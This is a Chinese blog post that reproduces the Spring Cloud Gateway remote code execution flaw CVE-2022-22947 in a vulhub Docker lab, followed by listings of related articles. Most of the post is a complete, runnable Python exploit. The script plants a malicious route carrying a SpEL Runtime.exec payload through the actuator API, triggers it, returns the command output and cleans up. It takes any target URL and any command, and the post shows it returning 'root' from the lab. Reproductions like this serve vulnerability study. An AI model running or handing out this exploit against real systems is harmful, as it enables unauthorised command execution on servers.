cve-2022-22947漏洞复现(Spring Cloud Gateway 远程代码执行漏洞)

最新推荐文章于 2025-09-11 04:21:08 发布
原创 最新推荐文章于 2025-09-11 04:21:08 发布 · 663 阅读 · 1 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#python #java #web安全

文章描述了一种在Docker容器环境下利用SpringCloudGatewayCVE-2022-22947漏洞进行远程代码执行的方法,包括了漏洞利用脚本的详细步骤和Pythonexploit的使用实例。

此次环境部署在docker环境中,亲测有效

更新vulhub

git pull

切换到/spring/cve-2022-22947目录

cd /spring/cve-2022-22947

┌──(root💀kali)-[/home/kali/vulhub]
└─# cd spring

┌──(root💀kali)-[/home/kali/vulhub/spring]
└─# ls
	CVE-2016-4977  CVE-2017-4971  CVE-2017-8046  CVE-2018-1270  CVE-2018-1273  CVE-2022-22947
┌──(root💀kali)-[/home/kali/vulhub/spring]
└─# cd CVE-2022-22947
┌──(root💀kali)-[/home/kali/vulhub/spring/CVE-2022-22947]
└─# docker-compose up -d      //拉取漏洞环境
	cve-2022-22947_spring_1 is up-to-date

┌──(root💀kali)-[/home/kali/vulhub/spring/CVE-2022-22947]
└─# docker-compose up -d    //查看靶场环境开启
	Starting cve-2022-22947_spring_1 ... done

在这里插入图片描述使用python写payload进行测试(大神的!!!

# Exploit Title: Spring Cloud Gateway 3.1.0 - Remote Code Execution (RCE)
# Google Dork: N/A
# Exploit Author: Carlos E. Vieira
# Vendor Homepage: https://spring.io/
# Software Link: https://spring.io/projects/spring-cloud-gateway
# Version: This vulnerability affect Spring Cloud Gateway < 3.0.7 & < 3.1.1
# Tested on: 3.1.0
# CVE : CVE-2022-22947

import random
import string
import requests
import json
import sys
import urllib.parse
import base64

headers = { "Content-Type": "application/json" , 'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36','Accept' : '*/*'}

id = ''.join(random.choice(string.ascii_lowercase) for i in range(8))

def exploit(url, command):
    
    payload = { "id": id, "filters": [{ "name": "AddResponseHeader", "args": { "name": "Result", "value": "#{new String(T(org.springframework.util.StreamUtils).copyToByteArray(T(java.lang.Runtime).getRuntime().exec(\u0022"+command+"\u0022).getInputStream()))}"}}],"uri": "http://example.com"}
    
    commandb64 =base64.b64encode(command.encode('utf-8')).decode('utf-8')      #将输入的命令进行base64编码

    rbase = requests.post(url + '/actuator/gateway/routes/'+id, headers=headers, data=json.dumps(payload), verify=False)
    if(rbase.status_code == 201):
        print("[+] Stage deployed to /actuator/gateway/routes/"+id)
        print("[+] Executing command...")
        r = requests.post(url + '/actuator/gateway/refresh', headers=headers, verify=False)
        if(r.status_code == 200):
            print("[+] getting result...")
            r = requests.get(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False)
            if(r.status_code == 200):
                get_response = r.json()
                clean(url, id)
                return get_response['filters'][0].split("'")[1]
            else:
                print("[-] Error: Invalid response")
                clean(url, id)
                exit(1)
        else:
            clean(url, id)
            print("[-] Error executing command")

    
def clean(url, id):
    remove = requests.delete(url + '/actuator/gateway/routes/' + id, headers=headers, verify=False)
    if(remove.status_code == 200):
        print("[+] Stage removed!")
    else:
        print("[-] Error: Fail to remove stage")

def banner():
    print("""
    ###################################################
    #                                                 #
    #   Exploit for CVE-2022-22947                    #
    #   - Carlos Vieira (Crowsec)                     #
    #                                                 #
    #   Usage:                                        #
    #   python3 exploit.py <url> <command>            #
    #                                                 #
    #   Example:                                      #
    #   python3 exploit.py http://localhost:8080 'id' #
    #                                                 #
    ###################################################
    """)

def main():
    banner()
    if len(sys.argv) != 3:
        print("[-] Error: Invalid arguments")
        print("[-] Usage: python3 exploit.py <url> <command>")
        exit(1)
    else:
        url = sys.argv[1]
        command = sys.argv[2]
        print(exploit(url, command))
if __name__ == '__main__':
    main()

执行该脚本,并进行命令执行。

┌──(root💀kali)-[/home/kali/vulhub/spring/CVE-2022-22947]
└─# python3 CVE-2022-22947.py http://192.168.2.129:8080 'whoami'                       //’whoami‘代码执行

在这里插入图片描述
root //代码执行后获取结果

完毕!!!

CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
weixin_45260839的博客
05-08 3598
CVE-2022-22947 Spring Cloud Gateway 远程代码执行漏洞复现
Spring Cloud Gateway远程代码执行CVE-2022-22947漏洞分析及复现
include_voidmain的博客
03-29 2106
0x01 漏洞描述 Spring Cloud Gateway 是基于 Spring Framework 和 Spring Boot 构建的 API 网关,它旨在为微服务架构提供一种简单、有效、统一的 API 路由管理方式。 据公布的漏洞描述称,当Spring Cloud Gateway 执行器端点启用、公开且不安全时,使用Spring Cloud Gateway的应用程序容易受到代码注入攻击。远程攻击者可以发出含有恶意代码的请求,从而允许在远程主机上任意远程执行。 0x02 漏洞影响 漏洞编号:CVE-2
CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
热门推荐
一只爱吃橙子的羊
03-12 2万+
CVE-2022-22947Spring Cloud Gateway 远程代码执行漏洞复现及修复建议
实验报告:CVE-2022-22947复现
最新发布
gitblog_00654的博客
09-11 415
- 操作系统:Ubuntu 22.04 - Docker版本:20.10.12 - 目标应用:Spring Cloud Gateway 3.1.0 ## 二、漏洞原理 SpEL表达式注入通过Actuator API实现... ## 三、复现步骤 1. 添加恶意路由 2. 触发表达式执行 3. 验证命令执行结果 ## 四、防御建议 - 升级到安全版本 - 禁用不必要的Actuator端点 - ...
Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现
m0_58596609的博客
10-11 2255
Spring Cloud Gateway RCE (CVE-2022-22947)漏洞复现
漏洞复现笔记(CVE-2022-22947
weixin_72760965的博客
06-14 434
2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行影响版本旧的、不受支持的版本也会受到影响漏洞原理Spring Cloud GatewaySpring中的一个API网关。
精选资源
CVE-2022-22947-Spring-Cloud-Gateway 内存马POC
03-29
Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露 Gateway Actuator 端点时,使用 Spring Cloud Gateway 的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而...
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947
web_15534274656的博客
09-11 916
深知大多数初中级Java工程师,想要提升技能,往往是自己摸索成长或者是报班学习,但对于培训机构动则近万的学费,着实压力不小。自己不成体系的自学效果低效又漫长,而且极易碰到天花板技术停滞不前!因此收集整理了一份《Java开发全套学习资料》送给大家,初衷也很简单,就是希望能够帮助到想自学提升又不知道该从何学起的朋友,同时减轻大家的负担。
CVE-2022-22947 Spring Cloud Gateway远程代码执行漏洞复现
热爱学习,喜欢折腾!
09-06 3412
Spring Cloud Gateway是基于Spring Framework 和 Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。建议使用Spring Cloud Gateway的用户及时安排自检并做好安全加固。近日,披露Spring Cloud Gateway存在一处远程代码执行漏洞CVE-2022-22947)。
Spring Cloud Gateway RCE漏洞原理分析与复现CVE-2022-22947
日常技术分享
10-16 8908
Spring Cloud Gateway RCE漏洞原理分析与复现CVE-2022-22947
CVE漏洞复现-CVE-2022-22947-Spring Cloud Gateway RCE
把自己活成一道光,因为你不知道,谁会借着你的光,走出了黑暗。请保持心中的善良,因为你不知道,谁会借着你的善良,走出了绝望。请保持你心中的信仰,因为你不知道,谁会借着你的信仰,走出了迷茫。请相信自己的力量,因为你不知道,谁会因为相信你,开始相信了自己....
04-10 2116
最开始时,我们开发java项目时,所有的代码都在一个工程里,我们把它称为单体架构。当我们的项目的代码量越来越大时,开发的成员越来越多时,这时我们项目的性能以及我们开发的效率都会存在非常大的问题,所以对于这样的项目,我们需要把它拆分为不同的服务,举个列子,原来很大的一个工程,我们把它拆分为一个个服务,比如说订单服务、用户服务、商品服务、物流服务、资金服务等等,因为有了这些服务之后,我们又引入了服务网关、服务注册发现、配置中心、调用链监控、Metrices监控等等的这些组件对这些服务进行协调和管理。
Spring Cloud GatewayCVE-2022-22947漏洞复现
weixin_45095113的博客
07-28 2774
Spring Cloud GatewayCVE-2022-22947漏洞复现
Spring Cloud 网关执行器 API SPEL 代码注入 (CVE-2022-22947)历史漏洞复现
chao321654987的博客
03-01 989
*”如有疑问或发现疏漏,欢迎评论区评论,共同完善知识体系“*2022年3月1日,VMware官方发布漏洞报告,在使用Spring Colud Gateway的应用程序开启、暴露Gateway Actuator端点时,会容易造成代码注入攻击,攻击者可以制造恶意请求,在远程主机进行任意远程执行。高危1.除了Spring Cloud Gateway 外,程序还用到了 Spring Boot Actuator 组件(它用于对外提供 /actuator/ 接口);2.Spring 配置对外暴露 gateway 接口,
CVE-2022-22947 Spring Cloud Gateway RCE漏洞复现分析
m0_61506558的博客
09-18 8986
Spring Cloud Gateway是基于Spring Framework和Spring Boot构建的API网关,它旨在为微服务架构提供一种简单、有效、统一的API路由管理方式。Spring官方博客发布了一篇关于Spring Cloud GatewayCVE报告,据公告描述,当启用和暴露Gateway Actuator端点时,使用Spring Cloud Gateway的应用程序可受到代码注入攻击。攻击者可以发送特制的恶意请求,从而远程执行任意代码。(二)漏洞复现
CVE-2022-22947 Spring Cloud Gateway RCE 复现
weixin_48645404的博客
12-14 897
Spring Cloud Gateway 远程代码执行漏洞CVE-2022-22947)发生在Spring Cloud Gateway应用程序的Actuator端点,其在启用、公开和不安全的情况下容易受到代码注入的攻击。攻击者可通过该漏洞恶意创建允许在远程主机上执行任意远程执行的请求。如果不需要Actuator,可以通过management.endpoint.gateway.enable:false配置将其禁用。官方已发布漏洞补丁及修复版本,请评估业务是否受影响后,酌情升级至安全版本。
评论
成就一亿技术人!
拼手气红包6.0元
还能输入1000个字符
 
红包 添加红包
表情包 插入表情
表情包 代码片
 条评论被折叠 查看
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值